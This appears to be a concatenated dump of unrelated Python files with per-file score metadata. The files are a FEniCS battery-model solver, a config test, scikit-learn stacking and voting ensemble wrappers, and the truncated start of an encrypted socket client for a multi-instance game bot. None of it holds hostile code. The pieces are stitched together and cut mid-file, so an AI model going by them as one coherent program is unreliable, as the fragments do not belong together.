for i in range(args.loopCount):
#appObj.velocity(yn, 0., V)
appObj.applyJacobian(yn, 0., B, AJ)
end = time.time()
print("elapsed ", end - start)
| 2.453125 | 2 |
tests/test_library.py | dtomlinson91/panaetius | 0 | 12772912 | import panaetius
def test_set_config(header, shared_datadir):
# arrange
config_path = str(shared_datadir / "without_logging")
# act
config = panaetius.Config(header, config_path)
panaetius.set_config(config, "some_top_string")
# assert
assert getattr(config, "some_top_string") == "some_top_value"
| 2.203125 | 2 |
buildup/fenics_/phase2/coupled_phie.py | macklenc/mtnlion | 0 | 12772913 | <filename>buildup/fenics_/phase2/coupled_phie.py<gh_stars>0
import sys
import dolfin as fem
import matplotlib.pyplot as plt
import numpy as np
import sympy as sym
from buildup import common, utilities
from mtnlion.newman import equations
# NOTE: Deprecated
def picard_solver(a, lin, estimated, previous, bc):
eps = 1.0
tol = 1e-5
iter = 0
maxiter = 25
while eps > tol and iter < maxiter:
fem.solve(a == lin, estimated, bc)
# calculate norm
diff = estimated.vector().get_local() - previous.vector().get_local()
eps = np.linalg.norm(diff, ord=np.Inf)
print("iter={}, norm={}".format(iter, eps))
# set previous solution
previous.assign(estimated)
iter += 1
def main():
# Times at which to run solver
time_in = [0.1, 5, 9.9, 10, 10.1, 15, 20]
dt = 0.1
time = [None] * (len(time_in) * 2)
time[::2] = [t - dt for t in time_in]
time[1::2] = time_in
I_1C = 20.5
Iapp = [I_1C if 10 <= i <= 20 else -I_1C if 30 <= i <= 40 else 0 for i in time]
# Collect common data
cmn = common.Common(time)
domain = cmn.domain
comsol = cmn.comsol_solution
k_norm_ref, csmax, alpha, L, a_s, sigma_eff = common.collect(
cmn.fenics_params, "k_norm_ref", "csmax", "alpha", "L", "a_s", "sigma_eff"
)
F, R, Tref, ce0, Acell = common.collect(cmn.fenics_consts, "F", "R", "Tref", "ce0", "Acell")
Lc, a_s, eps_e, sigma_eff, brug_kappa = common.collect(
cmn.fenics_params, "L", "a_s", "eps_e", "sigma_eff", "brug_kappa"
)
F, t_plus, R, T = common.collect(cmn.fenics_consts, "F", "t_plus", "R", "Tref")
x = sym.Symbol("ce")
y = sym.Symbol("x")
kp = cmn.fenics_consts.kappa_ref.subs(y, x)
dfdc = sym.Symbol("dfdc")
# dfdc = 0
kd = fem.Constant(2) * R * T / F * (fem.Constant(1) + dfdc) * (t_plus - fem.Constant(1))
kappa_D = fem.Expression(sym.printing.ccode(kd), dfdc=0, degree=1)
V = domain.V
v = fem.TestFunction(V)
du = fem.TrialFunction(V)
cse_f = fem.Function(V)
ce_f = fem.Function(V)
phis_f = fem.Function(V)
jbar = fem.Function(V)
phie_f = fem.Function(V) # "previous solution"
phie = fem.Function(V) # "previous solution"
kappa_ref = fem.Expression(sym.printing.ccode(kp), ce=ce_f, degree=1)
kappa_eff = kappa_ref * eps_e ** brug_kappa
kappa_Deff = kappa_D * kappa_ref * eps_e
Uocp = equations.Uocp(cse_f, **cmn.fenics_params)
j = equations.j(
ce_f, cse_f, phie_f, phis_f, Uocp, csmax, ce0, alpha, k_norm_ref, F, R, Tref, dm=domain.domain_markers
)
# phie(jbar, ce, phie, v, dx, L, a_s, F, kappa_eff, kappa_Deff, ds=0, neumann=0, nonlin=False, **kwargs):
u = fem.TrialFunction(V)
v = fem.TestFunction(V)
lhs, rhs = equations.phie(j, ce_f, u, v, kappa_eff, kappa_Deff, **cmn.fenics_params, **cmn.fenics_consts)
phie_form = (lhs - rhs) * domain.dx
# initialize matrix to save solution results
u_array = np.empty((len(time_in), len(comsol.mesh)))
u_array2 = np.empty((len(time_in), len(comsol.mesh)))
k = 0
for i in range(len(time_in)):
i_1 = i * 2 # previous time step
i = i * 2 + 1 # current time step
cse_f.vector()[:] = comsol.data.cse[i][fem.dof_to_vertex_map(V)].astype("double")
ce_f.vector()[:] = comsol.data.ce[i][fem.dof_to_vertex_map(V)].astype("double")
phie_f.vector()[:] = comsol.data.phie[i][fem.dof_to_vertex_map(V)].astype("double")
phis_f.vector()[:] = comsol.data.phis[i][fem.dof_to_vertex_map(V)].astype("double")
jbar.vector()[:] = comsol.data.j[i][fem.dof_to_vertex_map(V)].astype("double")
bc = [fem.DirichletBC(V, comsol.data.phie[i, 0], domain.boundary_markers, 1)]
Feq = phie_form
# fem.solve(fem.lhs(Feq) == fem.rhs(Feq), phie_f, bc)
phie.assign(phie_f)
picard_solver(fem.lhs(Feq), fem.rhs(Feq), phie_f, phie, bc)
# J = fem.derivative(Feq, phie_f, du)
# problem = fem.NonlinearVariationalProblem(Feq, phis_f, bc, J)
# solver = fem.NonlinearVariationalSolver(problem)
#
# prm = solver.parameters
# prm['newton_solver']['absolute_tolerance'] = 1e-8
# prm['newton_solver']['relative_tolerance'] = 1e-7
# prm['newton_solver']['maximum_iterations'] = 25
# prm['newton_solver']['relaxation_parameter'] = 1.0
# solver.solve()
u_array[k, :] = phie_f.vector().get_local()[fem.vertex_to_dof_map(domain.V)]
u_array2[k, :] = fem.interpolate(j, V).vector().get_local()[fem.vertex_to_dof_map(V)]
k += 1
d = dict()
d["x"] = comsol.mesh
d["ce"] = comsol.data.ce[1::2]
d["cse"] = comsol.data.cse[1::2]
d["phie"] = u_array
d["phis"] = comsol.data.phis[1::2]
neg_params = {k: v[0] if isinstance(v, np.ndarray) else v for k, v in cmn.params.items()}
d = dict(d, **neg_params)
def filter(x, sel="neg"):
if sel is "neg":
ind0 = 0
ind1 = cmn.comsol_solution.neg_ind
else:
ind0 = 2
ind1 = cmn.comsol_solution.pos_ind
if isinstance(x, list):
return x[ind0]
if isinstance(x, np.ndarray):
if len(x.shape) > 1:
return x[:, ind1]
return x[ind1]
return x
neg = dict(map(lambda x: (x[0], filter(x[1], "neg")), d.items()))
# dta = equations.eval_j(**neg, **cmn.consts)
utilities.report(comsol.mesh, time_in, u_array, comsol.data.phie[1::2], "$\Phi_e$")
plt.show()
# utilities.report(comsol.neg, time_in, dta,
# comsol.data.j[:, comsol.neg_ind][1::2], '$j^{neg}$')
# plt.show()
utilities.report(
comsol.pos, time_in, u_array2[:, comsol.pos_ind], comsol.data.j[:, comsol.pos_ind][1::2], "$j^{pos}$"
)
plt.show()
return 0
if __name__ == "__main__":
sys.exit(main())
| 2.296875 | 2 |
naszrzecznik2/signatures/apps.py | watchdogpolska/naszrzecznik2 | 0 | 12772914 | <reponame>watchdogpolska/naszrzecznik2
from __future__ import unicode_literals
from django.apps import AppConfig
class SignaturesConfig(AppConfig):
name = 'signatures'
| 1.148438 | 1 |
build/lib/ctrlengine/filters/__init__.py | 0xJeremy/ctrl.engine | 3 | 12772915 | from .simple_moving_average import simple_moving_average
simple_moving_average = simple_moving_average
from .exponentially_weighted_moving_average import exponentially_weighted_moving_average
exponentially_weighted_moving_average = exponentially_weighted_moving_average
| 1.4375 | 1 |
setup.py | guilledk/triopatterns | 12 | 12772916 | <filename>setup.py
#!/usr/bin/env python3
from setuptools import setup, find_packages
setup(
name="triopatterns",
packages=find_packages(),
version="0.1.0",
description="Useful async patterns I repeat everywere when using trio.",
install_requires=[
"trio"
]
)
| 1.359375 | 1 |
BPt/pipeline/ensemble_wrappers.py | sahahn/ABCD_ML | 1 | 12772917 |
from copy import deepcopy
from .helpers import set_n_jobs, replace_with_in_params
from sklearn.ensemble import (StackingRegressor, StackingClassifier,
VotingClassifier, VotingRegressor)
from joblib import Parallel, delayed
from sklearn.base import clone, is_classifier
from sklearn.utils import Bunch
from sklearn.model_selection import check_cv, cross_val_predict
import numpy as np
import pandas as pd
from .base import _fit_single_estimator, _get_est_fit_params
from ..main.CV import BPtCV
from sklearn.utils.validation import check_is_fitted
from sklearn.utils.multiclass import check_classification_targets
from sklearn.utils.metaestimators import available_if, if_delegate_has_method
from sklearn.preprocessing import LabelEncoder
from .helpers import (get_mean_fis, get_concat_fis, get_concat_fis_len,
check_for_nested_loader, get_nested_final_estimator)
def _fit_all_estimators(self, X, y, sample_weight=None, mapping=None,
fit_index=None):
# Validate
names, all_estimators = self._validate_estimators()
# Fit all estimators
self.estimators_ = Parallel(n_jobs=self.n_jobs)(
delayed(_fit_single_estimator)(clone(est), X, y, sample_weight,
mapping, fit_index)
for est in all_estimators if est != 'drop'
)
self.named_estimators_ = Bunch()
est_fitted_idx = 0
for name_est, org_est in zip(names, all_estimators):
if org_est != 'drop':
self.named_estimators_[name_est] = self.estimators_[
est_fitted_idx]
est_fitted_idx += 1
else:
self.named_estimators_[name_est] = 'drop'
return names, all_estimators
def voting_fit(self, X, y, sample_weight=None, mapping=None,
fit_index=None, **kwargs):
# Fit self.estimators_ on all data
self._fit_all_estimators(
X, y, sample_weight=sample_weight, mapping=mapping,
fit_index=fit_index)
return self
def _get_cv_inds(self, index):
# If BPtCV call get_cv
if isinstance(self.cv, BPtCV):
random_state = None
if hasattr(self, 'random_state'):
random_state = self.random_state
return self.cv.get_cv(fit_index=index,
random_state=random_state,
return_index=True)
# Otherwise treat as sklearn arg directly
return self.cv
def stacking_fit(self, X, y, sample_weight=None, mapping=None,
fit_index=None, **kwargs):
# Validate final estimator
self._validate_final_estimator()
# Fit self.estimators_ on all data
names, all_estimators = self._fit_all_estimators(
X, y, sample_weight=sample_weight, mapping=mapping,
fit_index=fit_index)
# To train the meta-classifier using the most data as possible, we use
# a cross-validation to obtain the output of the stacked estimators.
# Get cv inds w/ handle cases for BPtCV
cv_inds = self._get_cv_inds(fit_index)
# To ensure that the data provided to each estimator are the same, we
# need to set the random state of the cv if there is one and we need to
# take a copy.
cv = check_cv(cv_inds, y=y, classifier=is_classifier(self))
if hasattr(cv, 'random_state') and cv.random_state is None:
cv.random_state = np.random.RandomState()
# Proc stack method
stack_method = [self.stack_method] * len(all_estimators)
self.stack_method_ = [
self._method_name(name, est, meth)
for name, est, meth in zip(names, all_estimators, stack_method)
]
# Base fit params for sample weight
sample_weight_params = ({"sample_weight": sample_weight}
if sample_weight is not None else None)
# Get the fit params for each indv estimator
all_fit_params = [_get_est_fit_params(est, mapping=mapping,
fit_index=fit_index,
other_params=sample_weight_params)
for est in all_estimators]
# Catch rare error - TODO come up with fix
if X.shape[0] == X.shape[1]:
raise RuntimeError('Same numbers of data points and ',
'features can lead to error.')
# Make the cross validated internal predictions to train
# the final_estimator
predictions = Parallel(n_jobs=self.n_jobs)(
delayed(cross_val_predict)(clone(est), X, y, cv=deepcopy(cv),
method=meth, n_jobs=self.n_jobs,
fit_params=fit_params,
verbose=self.verbose)
for est, meth, fit_params in zip(all_estimators,
self.stack_method_,
all_fit_params) if est != 'drop'
)
# Only not None or not 'drop' estimators will be used in transform.
# Remove the None from the method as well.
self.stack_method_ = [
meth for (meth, est) in zip(self.stack_method_, all_estimators)
if est != 'drop'
]
# @TODO make sure train data index is concatenated correctly
X_meta = self._concatenate_predictions(X, predictions)
_fit_single_estimator(self.final_estimator_, X_meta, y,
sample_weight=sample_weight,
mapping=None,
fit_index=fit_index)
return self
def ensemble_classifier_fit(self, X, y,
sample_weight=None, mapping=None,
fit_index=None, **kwargs):
check_classification_targets(y)
# To make compatible with each Voting and Stacking ...
self._le = LabelEncoder().fit(y)
self.le_ = self._le
self.classes_ = self._le.classes_
transformed_y = self._le.transform(y)
return self.bpt_fit(X, transformed_y,
sample_weight=sample_weight,
mapping=mapping,
fit_index=fit_index,
**kwargs)
def _base_transform_feat_names(self, X_df, encoders=None, nested_model=False):
'''This base functions works under the assumption of calculating
mean coef's.'''
# Check each sub estimator for the method
# transform feat names
all_feat_names = []
for est in self.estimators_:
if hasattr(est, 'transform_feat_names'):
feat_names = est.transform_feat_names(X_df, encoders=encoders,
nested_model=nested_model)
all_feat_names.append(feat_names)
# If None found
if len(all_feat_names) == 0:
return list(X_df)
# If some found, only return updated if all the same
# So check if all same as first
# if any not the same, return base
for fn in all_feat_names[1:]:
if fn != all_feat_names[0]:
return list(X_df)
# Otherwise, return first
return all_feat_names[0]
def _loader_transform_feat_names(self, X_df, encoders=None, nested_model=False):
# Check each estimator
all_feat_names = []
for est in self.estimators_:
if hasattr(est, 'transform_feat_names'):
feat_names = est.transform_feat_names(X_df, encoders=encoders,
nested_model=nested_model)
all_feat_names.append(feat_names)
# If none found
if len(all_feat_names) == 0:
return list(X_df)
# Get concat list
all_concat = list(np.concatenate(all_feat_names))
# If all unique, return concat
if len(set(all_concat)) == len(all_concat):
return all_concat
# Otherwise, append unique identifier
all_concat = []
for i, fn in enumerate(all_feat_names):
all_concat += [str(i) + '_' + str(name) for name in fn]
return all_concat
def _transform_feat_names(self, X_df, encoders=None, nested_model=False):
if self.has_nested_loader():
return self._loader_transform_feat_names(X_df, encoders=encoders, nested_model=nested_model)
else:
return self._base_transform_feat_names(X_df, encoders=encoders, nested_model=nested_model)
def _get_fis_lens(self):
'''This method is used in loader version of voting ensembles'''
# If already stored as attribute, use that
if hasattr(self, 'concat_est_lens_'):
return getattr(self, 'concat_est_lens_')
# Try coef
fi_len = get_concat_fis_len(self.estimators_, 'coef_')
if fi_len is not None:
return fi_len
# Then feature importances
fi_len = get_concat_fis_len(self.estimators_, 'feature_importances_')
if fi_len is not None:
return fi_len
# TODO - could do a search in each base estimator to try and determine
# the final n features in ?
return None
def base_inverse_transform_fis(self, fis, avg_method):
# If not loader, return as is
if not self.has_nested_loader():
return fis
# Get underlying lengths
concat_fi_lens_ = self._get_fis_lens()
if concat_fi_lens_ is None:
return fis
# Go through and inverse transform each chunk
fi_chunks, ind = [], 0
for est, l in zip(self.estimators_, concat_fi_lens_):
# If any don't have it, return passed original
if not hasattr(est, 'inverse_transform_fis'):
return fis
# Append the inverse transformed chunk
fi_chunks.append(est.inverse_transform_fis(fis.iloc[ind:ind+l]))
ind += l
# Combine together in DataFrame
fi_df = pd.DataFrame(fi_chunks)
avg = avg_method(fi_df)
# Put back together in series, and return that
return pd.Series(avg, index=list(fi_df))
def voting_inverse_transform_fis(self, fis):
def mean_avg(fi_df):
return np.mean(np.array(fi_df), axis=0)
return self.base_inverse_transform_fis(fis, mean_avg)
def _get_estimator_fi_weights(estimator):
weights = None
if hasattr(estimator, 'coef_'):
weights = getattr(estimator, 'coef_')
if weights is None and hasattr(estimator, 'feature_importances_'):
weights = getattr(estimator, 'feature_importances_')
if weights is None:
return None
# Set to absolute
weights = np.abs(weights)
# Shape if not 1D is (1, n_features) or (n_classes, n_features)
# TODO handle multiclass
if len(np.shape(weights)) > 1:
weights = weights[0]
return weights
def stacking_inverse_transform_fis(self, fis):
def stacked_avg(fi_df):
# First assumption we need to make is that we
# are only interested in absolute values
fis = np.abs(np.array(fi_df))
# Use coef / feat importance from estimator as weights
weights = _get_estimator_fi_weights(self.final_estimator_)
if weights is None:
return None
# Return weighted average
try:
return np.average(fis, axis=0, weights=weights)
except ZeroDivisionError:
return np.average(fis, axis=0)
return self.base_inverse_transform_fis(fis, stacked_avg)
def has_nested_loader(self):
# If not already set, set
if not hasattr(self, 'nested_loader_'):
setattr(self, 'nested_loader_',
check_for_nested_loader(self.estimators_))
return getattr(self, 'nested_loader_')
def ensemble_transform(self, X):
# If nested model case, return concatenation of transforms
if self.has_nested_loader():
# Init
Xts, self.concat_est_lens_ = [], []
for estimator in self.estimators_:
# Get transformed X, passing along nested model True
Xt = estimator.transform(X, nested_model=True)
# Keep track of transformed + length
Xts.append(Xt)
self.concat_est_lens_.append(Xt.shape[-1])
# Return concat along axis 1
return np.concatenate(Xts, axis=1)
# TODO - non nested loader case, but still nested model case
else:
raise RuntimeError('Not implemented.')
def _get_estimators_pred_chunks(self, X, method='predict'):
# Convert method to list if not
if not isinstance(method, list):
method = [method for _ in range(len(self.estimators_))]
# Go through each estimator, to make predictions
# on just the chunk of transformed input relevant for each.
pred_chunks, ind = [], 0
for estimator, l, m in zip(self.estimators_, self.concat_est_lens_, method):
# Get the corresponding final estimator
final_estimator = get_nested_final_estimator(estimator)
# Get predictions
pred_chunk = getattr(final_estimator, m)(X[:, ind:ind+l])
# Append predictions
pred_chunks.append(pred_chunk)
# Increment index
ind += l
return np.asarray(pred_chunks)
def _stacked_classifier_predict(self, X, method, **predict_params):
check_is_fitted(self)
# Nested loader case
if self.has_nested_loader():
# Get predict probas from each
predict_probas = self._get_estimators_pred_chunks(X, method=self.stack_method_)
concat_preds = self._concatenate_predictions(X, predict_probas)
# Make preds with final estimator on concat preds
y_pred = getattr(self.final_estimator_, method)(concat_preds)
# If predict, cast to inverse transform
if method == 'predict':
y_pred = self._le.inverse_transform(y_pred)
return y_pred
# TODO finish other case for stacked classifier
raise RuntimeError('Not Implemented')
class BPtStackingRegressor(StackingRegressor):
_needs_mapping = True
_needs_fit_index = True
_fit_all_estimators = _fit_all_estimators
fit = stacking_fit
_get_cv_inds = _get_cv_inds
has_nested_loader = has_nested_loader
transform_feat_names = _transform_feat_names
_base_transform_feat_names = _base_transform_feat_names
_loader_transform_feat_names = _loader_transform_feat_names
_get_fis_lens = _get_fis_lens
inverse_transform_fis = stacking_inverse_transform_fis
base_inverse_transform_fis = base_inverse_transform_fis
_get_estimators_pred_chunks = _get_estimators_pred_chunks
ensemble_transform = ensemble_transform
@property
def feature_importances_(self):
if self.has_nested_loader():
return get_concat_fis(self.estimators_, 'feature_importances_')
# TODO - average according to stacked ...
@property
def coef_(self):
if self.has_nested_loader():
return get_concat_fis(self.estimators_, 'coef_')
# TODO - average according to stacked ...
def transform(self, X, nested_model=False):
# Not nested, base case transform
if not nested_model:
return super().transform(X)
return self.ensemble_transform(X)
def predict(self, X):
# Base case is when number of features stays the same as expected.
if X.shape[-1] == self.n_features_in_:
return super().predict(X)
check_is_fitted(self)
# Nested loader case
if self.has_nested_loader():
# If nested loader, then the expectation is that this
# predict is receiving the concat fully model nested transformed
# output from each of the self.estimators_
pred_chunks = self._get_estimators_pred_chunks(X, method='predict').T
# Return predictions from final estimator
return self.final_estimator_.predict(pred_chunks)
# TODO fill in other case?
raise RuntimeError('Not Implemented')
class BPtStackingClassifier(StackingClassifier):
_needs_mapping = True
_needs_fit_index = True
_fit_all_estimators = _fit_all_estimators
bpt_fit = stacking_fit
fit = ensemble_classifier_fit
_get_cv_inds = _get_cv_inds
has_nested_loader = has_nested_loader
transform_feat_names = _transform_feat_names
_base_transform_feat_names = _base_transform_feat_names
_loader_transform_feat_names = _loader_transform_feat_names
_get_fis_lens = _get_fis_lens
inverse_transform_fis = stacking_inverse_transform_fis
base_inverse_transform_fis = base_inverse_transform_fis
_get_estimators_pred_chunks = _get_estimators_pred_chunks
ensemble_transform = ensemble_transform
_stacked_classifier_predict = _stacked_classifier_predict
@property
def feature_importances_(self):
if self.has_nested_loader():
return get_concat_fis(self.estimators_, 'feature_importances_')
# TODO - average according to stacked ...
@property
def coef_(self):
if self.has_nested_loader():
return get_concat_fis(self.estimators_, 'coef_')
# TODO - average according to stacked ...
def transform(self, X, nested_model=False):
# Not nested, base case transform
if not nested_model:
return super().transform(X)
return self.ensemble_transform(X)
@if_delegate_has_method(delegate="final_estimator_")
def predict(self, X, **predict_params):
# Base case
if X.shape[-1] == self.n_features_in_:
return super().predict(X, **predict_params)
# Other case
return self._stacked_classifier_predict(X, method='predict', **predict_params)
@if_delegate_has_method(delegate="final_estimator_")
def predict_proba(self, X):
# Base case
if X.shape[-1] == self.n_features_in_:
return super().predict_proba(X)
# Other case
return self._stacked_classifier_predict(X, method='predict_proba')
@if_delegate_has_method(delegate="final_estimator_")
def decision_function(self, X):
# Base case
if X.shape[-1] == self.n_features_in_:
return super().decision_function(X)
# Other case
return self._stacked_classifier_predict(X, method='decision_function')
class BPtVotingRegressor(VotingRegressor):
# Set tags
_needs_mapping = True
_needs_fit_index = True
# Override / set methods
_fit_all_estimators = _fit_all_estimators
fit = voting_fit
has_nested_loader = has_nested_loader
transform_feat_names = _transform_feat_names
_base_transform_feat_names = _base_transform_feat_names
_loader_transform_feat_names = _loader_transform_feat_names
_get_fis_lens = _get_fis_lens
inverse_transform_fis = voting_inverse_transform_fis
base_inverse_transform_fis = base_inverse_transform_fis
ensemble_transform = ensemble_transform
_get_estimators_pred_chunks = _get_estimators_pred_chunks
@property
def feature_importances_(self):
if self.has_nested_loader():
return get_concat_fis(self.estimators_, 'feature_importances_')
return get_mean_fis(self.estimators_, 'feature_importances_')
@property
def coef_(self):
if self.has_nested_loader():
return get_concat_fis(self.estimators_, 'coef_')
return get_mean_fis(self.estimators_, 'coef_')
def predict(self, X):
# Make sure fitted
check_is_fitted(self)
# Base case is when number of features stays the same as expected.
if X.shape[-1] == self.n_features_in_:
return super().predict(X)
# Otherwise, two cases, nested loader or not
if self.has_nested_loader():
# If nested loader, then the expectation is that this
# predict is receiving the concat fully model nested transformed
# output from each of the self.estimators_
pred_chunks = self._get_estimators_pred_chunks(X, method='predict')
# The voting ensemble just uses the mean from each
mean_preds = np.mean(pred_chunks, axis=0)
return mean_preds
# TODO fill in other case?
raise RuntimeError('Not Implemented')
def transform(self, X, nested_model=False):
# Not nested, base case transform
if not nested_model:
return super().transform(X)
return self.ensemble_transform(X)
class BPtVotingClassifier(VotingClassifier):
_needs_mapping = True
_needs_fit_index = True
_fit_all_estimators = _fit_all_estimators
bpt_fit = voting_fit
fit = ensemble_classifier_fit
has_nested_loader = has_nested_loader
transform_feat_names = _transform_feat_names
_base_transform_feat_names = _base_transform_feat_names
_loader_transform_feat_names = _loader_transform_feat_names
_get_fis_lens = _get_fis_lens
inverse_transform_fis = voting_inverse_transform_fis
base_inverse_transform_fis = base_inverse_transform_fis
ensemble_transform = ensemble_transform
_get_estimators_pred_chunks = _get_estimators_pred_chunks
@property
def feature_importances_(self):
if self.has_nested_loader():
return get_concat_fis(self.estimators_, 'feature_importances_')
return get_mean_fis(self.estimators_, 'feature_importances_')
@property
def coef_(self):
if self.has_nested_loader():
return get_concat_fis(self.estimators_, 'coef_')
return get_mean_fis(self.estimators_, 'coef_')
def _check_voting(self):
if self.voting == "hard":
raise AttributeError(
f"predict_proba is not available when voting={repr(self.voting)}"
)
return True
def predict(self, X):
# Make sure fitted
check_is_fitted(self)
# Base case is when number of features stays the same as expected.
if X.shape[-1] == self.n_features_in_:
return super().predict(X)
# If loader based
if self.has_nested_loader():
# If nested loader, then the expectation is that this
# predict is receiving the concat fully model nested transformed
# output from each of the self.estimators_
# If soft voting, can use predict proba instead
if self.voting == "soft":
maj = np.argmax(self.predict_proba(X), axis=1)
# Hard voting, use base pred
else:
# Get predictions with special nested
predictions = self._get_estimators_pred_chunks(X, method='predict')
# Get majority vote w/
maj = np.apply_along_axis(
lambda x: np.argmax(np.bincount(x, weights=self._weights_not_none)),
axis=1,
arr=predictions,
)
# Use label encoder to inverse transform before returning
maj = self.le_.inverse_transform(maj)
return maj
# TODO fill in other case?
raise RuntimeError('Not Implemented')
def transform(self, X, nested_model=False):
# Not nested, base case transform
if not nested_model:
return super().transform(X)
return self.ensemble_transform(X)
@available_if(_check_voting)
def predict_proba(self, X):
check_is_fitted(self)
# Base case is when number of features stays the same as expected.
if X.shape[-1] == self.n_features_in_:
return super().predict_proba(X)
# Otherwise, two cases, nested loader or not
if self.has_nested_loader():
# Get predict probas from each
predict_probas = self._get_estimators_pred_chunks(X, method='predict_proba')
# Calculate average
avg = np.average(predict_probas, axis=0, weights=self._weights_not_none)
# And return
return avg
# TODO fill in other case?
raise RuntimeError('Not Implemented')
class EnsembleWrapper():
def __init__(self, model_params, ensemble_params,
_get_ensembler, n_jobs, random_state):
self.model_params = model_params
self.ensemble_params = ensemble_params
self._get_ensembler = _get_ensembler
self.n_jobs = n_jobs
self.random_state = random_state
def _update_params(self, p_name, to_add):
# Get existing
params = getattr(self, p_name)
# Fill in new
new_params = {}
for key in params:
new_params[to_add + '__' + key] = params[key]
# Update
setattr(self, p_name, new_params)
def _update_model_ensemble_params(self, to_add, model=True, ensemble=True):
if model:
self._update_params('model_params', to_add)
if ensemble:
self._update_params('ensemble_params', to_add)
def _basic_ensemble(self, models, name, ensemble=False):
if len(models) == 1:
return models
else:
basic_ensemble = self._get_ensembler(models)
self._update_model_ensemble_params(name, ensemble=ensemble)
return [(name, basic_ensemble)]
def get_updated_params(self):
self.model_params.update(self.ensemble_params)
return self.model_params
def wrap_ensemble(self, models, ensemble, ensemble_params,
final_estimator=None,
final_estimator_params=None):
# If no ensemble is passed, return either the 1 model,
# or a voting wrapper
if ensemble is None or len(ensemble) == 0:
return self._basic_ensemble(models=models,
name='Default Voting',
ensemble=True)
# Otherwise special ensembles
else:
# If needs a single estimator, but multiple models passed,
# wrap in ensemble!
if ensemble_params.single_estimator:
se_ensemb_name = 'Single-Estimator Compatible Ensemble'
models = self._basic_ensemble(models,
se_ensemb_name,
ensemble=False)
# If no split and single estimator
if ensemble_params.single_estimator:
return self._wrap_single(models, ensemble,
ensemble_params.n_jobs_type)
# Last case is, no split/DES ensemble and also
# not single estimator based
# e.g., in case of stacking regressor.
else:
return self._wrap_multiple(models, ensemble,
final_estimator,
final_estimator_params,
ensemble_params.n_jobs_type,
ensemble_params.cv)
def _wrap_single(self, models, ensemble_info, n_jobs_type):
'''If passed single_estimator flag'''
# Unpack ensemble info
ensemble_name = ensemble_info[0]
ensemble_obj = ensemble_info[1][0]
ensemble_extra_params = ensemble_info[1][1]
# Models here since single estimator is assumed
# to be just a list with
# of one tuple as
# [(model or ensemble name, model or ensemble)]
base_estimator = models[0][1]
# Set n jobs based on passed type
if n_jobs_type == 'ensemble':
model_n_jobs = 1
ensemble_n_jobs = self.n_jobs
else:
model_n_jobs = self.n_jobs
ensemble_n_jobs = 1
# Set model / base_estimator n_jobs
set_n_jobs(base_estimator, model_n_jobs)
# Make sure random_state is set (should be already)
if hasattr(base_estimator, 'random_state'):
setattr(base_estimator, 'random_state', self.random_state)
# Create the ensemble object
ensemble = ensemble_obj(base_estimator=base_estimator,
**ensemble_extra_params)
# Set ensemble n_jobs
set_n_jobs(ensemble, ensemble_n_jobs)
# Set random state
if hasattr(ensemble, 'random_state'):
setattr(ensemble, 'random_state', self.random_state)
# Wrap as object
new_ensemble = [(ensemble_name, ensemble)]
# Have to change model name to base_estimator
self.model_params =\
replace_with_in_params(self.model_params, models[0][0],
'base_estimator')
# Append ensemble name to all model params
self._update_model_ensemble_params(ensemble_name,
ensemble=False)
return new_ensemble
def _wrap_multiple(self, models, ensemble_info,
final_estimator, final_estimator_params,
n_jobs_type, cv):
'''In case of no split/DES ensemble, and not single estimator based.'''
# Unpack ensemble info
ensemble_name = ensemble_info[0]
ensemble_obj = ensemble_info[1][0]
ensemble_extra_params = ensemble_info[1][1]
# Models here just self.models a list of tuple of
# all models.
# So, ensemble_extra_params should contain the
# final estimator + other params
# Set model_n_jobs and ensemble n_jobs based on type
if n_jobs_type == 'ensemble':
model_n_jobs = 1
ensemble_n_jobs = self.n_jobs
else:
model_n_jobs = self.n_jobs
ensemble_n_jobs = 1
# Set the model jobs
set_n_jobs(models, model_n_jobs)
# Make sure random state is propegated
for model in models:
if hasattr(model[1], 'random_state'):
setattr(model[1], 'random_state', self.random_state)
# Determine the parameters to init the ensemble
pass_params = ensemble_extra_params
pass_params['estimators'] = models
# Process final_estimator if passed
if final_estimator is not None:
# Replace name of final estimator w/ final_estimator in params
final_estimator_params =\
replace_with_in_params(params=final_estimator_params,
original=final_estimator[0][0],
replace='final_estimator')
# Add final estimator params to model_params - once name changed
# to avoid potential overlap.
self.model_params.update(final_estimator_params)
# Unpack actual model obj
final_estimator_obj = final_estimator[0][1]
# Set final estimator n_jobs to model n_jobs
set_n_jobs(final_estimator_obj, model_n_jobs)
# Redundant random state check
if hasattr(final_estimator_obj, 'random_state'):
setattr(final_estimator_obj, 'random_state', self.random_state)
# Add to pass params
pass_params['final_estimator'] = final_estimator_obj
# Check if cv passed
if cv is not None:
pass_params['cv'] = cv
# Init the ensemble object
ensemble = ensemble_obj(**pass_params)
# Set ensemble n_jobs
set_n_jobs(ensemble, ensemble_n_jobs)
# Set random state
if hasattr(ensemble, 'random_state'):
setattr(ensemble, 'random_state', self.random_state)
# Wrap as pipeline compatible object
new_ensemble = [(ensemble_name, ensemble)]
# Append ensemble name to all model params
self._update_model_ensemble_params(ensemble_name,
ensemble=False)
return new_ensemble
| 1.882813 | 2 |
v10b/client.py | gavinIRL/RHBotArray | 0 | 12772918 | <reponame>gavinIRL/RHBotArray
import socket
import select
import errno
import sys
from win32gui import GetWindowText, GetForegroundWindow
from win32api import GetSystemMetrics
from windowcapture import WindowCapture
import ctypes
from pynput.keyboard import Key, Listener, KeyCode
from pynput import mouse, keyboard
from random import randint, random, uniform
import subprocess
import threading
import time
import os
from cryptography.fernet import Fernet
from quest_handle import QuestHandle
from sell_repair import SellRepair
from hsvfilter import grab_object_preset, HsvFilter
from vision import Vision
import cv2
import pytesseract
from fuzzywuzzy import process
import pydirectinput
import numpy as np
os.chdir(os.path.dirname(os.path.abspath(__file__)))
class RHBotClientConnection():
def __init__(self, ip, delay=0) -> None:
self.delay = delay
self.HEADER_LENGTH = 10
self.IP = ip
self.PORT = 1351
self.my_username = "Admin"
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client_socket.connect((self.IP, self.PORT))
self.client_socket.setblocking(False)
username = self.my_username.encode('utf-8')
username_header = f"{len(username):<{self.HEADER_LENGTH}}".encode(
'utf-8')
self.client_socket.send(username_header + username)
with open("key.key") as f:
key = f.read()
self.fern = Fernet(key)
def send_message(self, message):
if self.delay > 0:
self.send_message_delayed(message, self.delay)
else:
message = message.encode('utf-8')
message = self.fern.encrypt(message)
message_header = f"{len(message):<{self.HEADER_LENGTH}}".encode(
'utf-8')
self.client_socket.send(message_header + message)
def send_message_delayed(self, message, delay):
start_time = time.time()
t = threading.Thread(target=self.delay_thread,
args=(message, delay, start_time))
t.start()
def delay_thread(self, message, delay, start_time):
message = message.encode('utf-8')
